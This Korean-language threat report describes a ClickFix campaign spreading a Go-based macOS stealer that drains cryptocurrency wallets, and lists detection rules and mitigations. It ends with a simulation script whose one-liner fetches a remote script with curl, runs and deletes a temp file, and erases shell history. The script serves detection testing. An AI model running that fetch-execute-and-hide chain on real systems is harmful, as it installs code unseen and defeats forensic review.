macOS 정보 탈취자, 암호화폐 지갑을 노린다
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
Go 기반의 macOS 스틸러가 ClickFix 소셜 엔지니어링 캠페인을 통해 암호화폐 사용자를 노리고 있습니다. 이 악성코드는 애플 키체인과 브라우저 저장소에서 민감한 자격 증명을 훔치고 피해자의 지갑에서 암호화폐 잔액을 점진적으로 고갈시키는 기능도 가지고 있습니다. 감염 사슬은 아키텍처별 Mach-O 페이로드를 제공하는 셸 스크립트 프로파일러로 시작됩니다.
조사
Huntress 분석가는 회고적 탐색 중 이 위협을 발견하고 약 3개월 동안 활성 상태를 유지해온 macOS 전용 스틸러의 구성 요소를 식별했습니다. 조사는 지원 인프라를 제재된 러시아의 불릿프루프 호스팅 제공업체 Aeza Group과 연결했습니다. 연구원들은 초기 ClickFix 소셜 엔지니어링 프롬프트부터 최종 페이로드 실행과 C2 통신까지 공격 사슬을 재구성했습니다.
완화
사용자는 의심스러운 CAPTCHA 프롬프트와 터미널에 명령을 입력해야 하는 비정상적인 지시에 주의해야 합니다. 악성 스크립트를 차단하도록 설계된 NoScript와 같은 브라우저 확장 및 Pi-hole 같은 DNS 기반 차단 도구가 노출을 줄이는 데 도움이 될 수 있습니다. ClickFix 소셜 엔지니어링에 중점을 둔 포괄적인 사용자 인식 교육은 가장 효과적인 방어책 중 하나입니다.
대응
감염이 발견되면 영향을 받은 macOS 시스템을 즉시 격리하여 추가 데이터 유출이나 암호화폐 지갑 감소를 막아야 합니다. 관리자는 모든 악성 Mach-O 바이너리 및 연관된 지속성 메커니즘을 찾아 제거해야 합니다. 악성코드가 자격 증명을 타겟으로 하기 때문에 손상된 기기에서 액세스된 모든 계정의 비밀번호를 초기화해야 합니다.
공격 흐름
탐지
비표준 경로에서 Launchctl 부트스트랩 (process_creation 경유)
Proof of Value
System_profiler 열거 시도 가능성 (process_creation 경유)
Proof of Value
의심스러운 Curl 실행 시도 [MacOS] (cmdline 경유)
Proof of Value
탐지할 IOCs (HashSha256): 암호화폐를 노리는 macOS 악성코드
Proof of Value
탐지할 IOCs (SourceIP): 암호화폐를 노리는 macOS 악성코드
Proof of Value
탐지할 IOCs (DestinationIP): 암호화폐를 노리는 macOS 악성코드
Proof of Value
MacOS 악성코드 지속성 및 실행 기술 탐지 [Linux 파일 이벤트]
Proof of Value
암호화폐 고갈 macOS 악성코드 공격 [Linux 프로세스 생성]
Proof of Value
시뮬레이션 실행
선행 조건: 원격 측정 및 기준 사전 점검이 통과해야 합니다.
이유: 이 섹션에서는 탐지 규칙을 작동시키기 위해 설계된 적대적 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령과 이야기는 식별된 TTP를 직접 반영해야 하며 탐지 논리에서 기대하는 정확한 원격 측정을 생성하려고 노력해야 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 수 있습니다.
-
공격 서사 및 명령: 적대자가 ClickFix 사기를 시작합니다. 피해자는 터미널에 명령을 실행하도록 속임을 당합니다. 명령은
curl -kFsSL을 사용하여 악성 스크립트를 조용히 다운로드합니다. 흔적을 남기지 않기 위해 스크립트는 즉시 자체 임시 파일을 삭제하는 bash one-liner를 통해 실행됩니다 (.UlaccK). 마지막으로 공격자는 복잡한 명령을 실행하여 사용자 쉘 기록에서 명령을 제거하여 일상적인 법의학적 검사에서는 공격을 보이지 않게 합니다.history명령을 실행하여 사용자의 쉘 기록에서 명령을 외과적으로 제거하여 일상적인 포렌식 검사에서는 공격이 보이지 않게 합니다. -
회귀 테스트 스크립트:
#!/bin/bash # ClickFix macOS 악성코드 공격 시뮬레이션 # 이 스크립트는 탐지 규칙이 요구하는 정확한 문자열 패턴을 모방합니다. echo "[+] 시뮬레이션 시작 중..." # 1. curl 다운로드 시뮬레이션 (Selection 3) # 2. bash 실행 및 즉시 삭제 시뮬레이션 (Selection 1) # 3. 히스토리 조작 시뮬레이션 (Selection 2) # 이러한 사항들을 결합하여 행동 패턴을 모방합니다 # 참고: 실제 악성코드 실행을 피하기 위해 더미 URL을 사용합니다 curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] 시뮬레이션 명령 실행됨." echo "[!] '암호화폐 고갈 macOS 악성코드 공격' 경고를 SIEM에서 확인하십시오." -
정리 명령:
# 시뮬레이션에 의해 생성된 아티팩트 제거 rm -f .UlaccK # 참고: 스크립트의 히스토리 조작은 회피를 시뮬레이션하는 것으로, # 테스트 사용자를 위해 수동으로 히스토리를 복원해야 할 수 있습니다.